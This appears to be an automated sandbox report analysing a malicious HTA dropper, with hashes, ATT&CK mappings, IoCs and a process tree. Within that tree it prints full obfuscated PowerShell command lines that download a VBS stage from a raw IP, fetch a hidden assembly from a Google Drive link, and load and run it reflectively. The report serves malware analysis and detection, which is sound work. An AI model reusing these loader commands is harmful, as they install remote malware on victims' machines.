4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d

General

Target

4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d.hta
Size

130KB
MD5

0b1aa8ae190d05df71f4052fae67df5b
SHA1

f6fe29f3e7830b15e3b244ba83216c029dcb60fb
SHA256

4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d
SHA512

94008a8bf00a1334c16129258243bf89d8351c82ede845fefdb657838fe2f602f761b9935e5fef5e01b368096993f49a48e65d3705cea948d9435db0df370a04
SSDEEP

96:Eam7QSo4DH5wo4DH5rtTRJP4srvjTKP4DH5Sr4DH5NFAb5UAf4DH5G7T:Ea2Rok0RLknYoVT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2672 powershell.exe
2904 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

powershell.exepOweRshEll.eXe

pid process

2592 powershell.exe
2588 pOweRshEll.eXe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2672	powershell.exe
2904	powershell.exe

pid	process
2592	powershell.exe
2588	pOweRshEll.eXe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exepOweRshEll.eXe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOweRshEll.eXe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

mshta.exe

description	pid	process	target process
PID 2996 wrote to memory of 2588	2996	mshta.exe	pOweRshEll.eXe
PID 2996 wrote to memory of 2588	2996	mshta.exe	pOweRshEll.eXe
PID 2996 wrote to memory of 2588	2996	mshta.exe	pOweRshEll.eXe
PID 2996 wrote to memory of 2588	2996	mshta.exe	pOweRshEll.eXe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2996
- C:\Windows\SysWOW64\WinDOWspOwershElL\v1.0\pOweRshEll.eXe
  "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  PID:2588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
    3⤵
    - Evasion via Device Credential Deployment
    PID:2592
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pbcttpwa.cmdline"
    3⤵
    PID:2652
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES585E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC585D.tmp"
      4⤵
      PID:2516
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
    3⤵
    PID:580
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2672
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES585E.tmp

Filesize
1KB

MD5
9b3abf09f4a8640f8a37050a8e0ea2d8

SHA1
c516a678dd055cda42fcc37c0c967d6bf8eb7c39

SHA256
cd5c9a8e1df02316d076255eff10fcbd8a7c663296c97650ab417984507aefa5

SHA512
4f4aa9c484f34c38f42aa7017e73839c9b11542516a0bd6cdc9d4aff44172231711045fe6b96935c66c9a9d8f5641878f562646a1a476b0bbccd9236ba49ff41

Download Submit
C:\Users\Admin\AppData\Local\Temp\pbcttpwa.dll

Filesize
3KB

MD5
d3f6a7bbaa6223578428047c2c04f202

SHA1
20b2c32e2b8d3d04010b1843955a268887c2f406

SHA256
5b7f61ca44648b23e79776793ade7c141a8b6728c8ea8ed9ffc9e7abc3f5a468

SHA512
210cdc320cef3235033958b93d42e78a64ff55d35a4fcffcf468ff7be06a28b46c7e21502058db45220fa5b598984ad9ab4a54eaf1c56358d3c7f475d76d788b

Download Submit
C:\Users\Admin\AppData\Local\Temp\pbcttpwa.pdb

Filesize
7KB

MD5
766766c56d86c0e72a886a6e8160538b

SHA1
4e455a16c62f9d203a6c17750ae1b7f3f2fe4da3

SHA256
c22ba34f1eb3ea499bf53e8c4226332ea8a5a4166000025a22495952f1be0a9f

SHA512
f4d1d8097ba7ea5dfdc3e19da77846c39ef434b07904c15b4acd805892100ae344ccfede44256d0255132eda31d48e32ceee797e18032d1f785b6893151d5bfd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XR7C13KNX4II2X3MCW0O.temp

Filesize
7KB

MD5
9e2b493dcf499654764f8fbdf7303c0c

SHA1
c46d9cc28dba9edcb0dca8df82c290b8ca03cd7a

SHA256
5ab5202fe8c8182fce3f8c753c6861bd0cb1be5621f6a030e576b5045892bc89

SHA512
9807c0bf619be248c07c579c673bd42936b2fb3a514530f2b6d7a6084dfd5cf4ac968857c1e668fbc35888137ffdf044ec534d994b830704b269376fd425d438

Download Submit
C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS

Filesize
136KB

MD5
52a69ab69d1c871566791a3c06982607

SHA1
367845c8b76d602680ee6069f3bde95e02c350d9

SHA256
4f6090a3d6a848ae3ef2310caca02976fe8448fc21cbe357f4a28a88f34ead28

SHA512
681b60151ef27726f8b4c9c0949a8962fa8b16fe3583ba5ee4019831b6ac2ad5bf2562da0e8fc55cdec4cb10c59a608896b9be98bedd1a8bbde43b711ee2e0c2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC585D.tmp

Filesize
652B

MD5
4f67dc16cba4663e3a775fb9bc7e2b8b

SHA1
6aeb51e26f82155bc9a480a4c62dacf434470b36

SHA256
8749b39eaede010fa702888a950881497516796a39524f92fff485ea6f29a69c

SHA512
2136540dff822339860e748eb563d2d1a846e0b16d37aacf06b0cd85082f57ea09b168b4d80ffca6d048a338bc0cdac3b1eb650cc68199c4b628df0285d2ea1b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pbcttpwa.0.cs

Filesize
469B

MD5
de4a3e7070e220b427d460a803bf2b1b

SHA1
f59c55466008ca3d557cc114c01395ba724a3a32

SHA256
0652da0455490eaf890ddcbc122a763d5f4031a9b2825d514d105bd8ea142eae

SHA512
afed9ff23e8f788d80f409856741bc68e985eb0092412f91e709d917fc37ea47e43b2560313195e5c0f8facc6232ddd74e5ca38c66d16af31d5f7b4984999b85

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pbcttpwa.cmdline

Filesize
309B

MD5
f4c50af9c38ddf4714be96c985fd2aab

SHA1
4ce931833a2c324d9000307f6b5896fc746a06e4

SHA256
4a9b64f0415bb3b75d8718b6cffb8d4a91fa1db5c6bb7073749952a0f5e95886

SHA512
90ef106279133865c1c2177921c115f5f10c98f9e33c0c618a80fad66a8bed2f36b2c63f8c761de383f20984c979443020197a52025a48bb6924725d8522ebc8

Download Submit

Analysis

Sharing